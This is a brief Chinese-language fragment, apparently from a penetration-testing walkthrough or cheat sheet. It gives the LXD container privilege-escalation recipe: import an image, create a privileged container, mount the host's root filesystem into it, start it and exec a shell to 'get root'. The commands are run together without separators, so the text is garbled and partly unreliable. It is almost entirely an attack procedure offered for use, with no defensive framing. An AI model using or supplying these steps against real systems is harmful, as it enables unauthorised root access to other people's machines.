下载到 /tmp 目录 1 导入镜像,查看确认导入 lxd initlxc init y2my privesc -c security.privileged=truelxc config device add privesc y2my disk source=/ path=/mnt/root recursive=truelxc start privesclxc exec privesc /bin/sh 得到root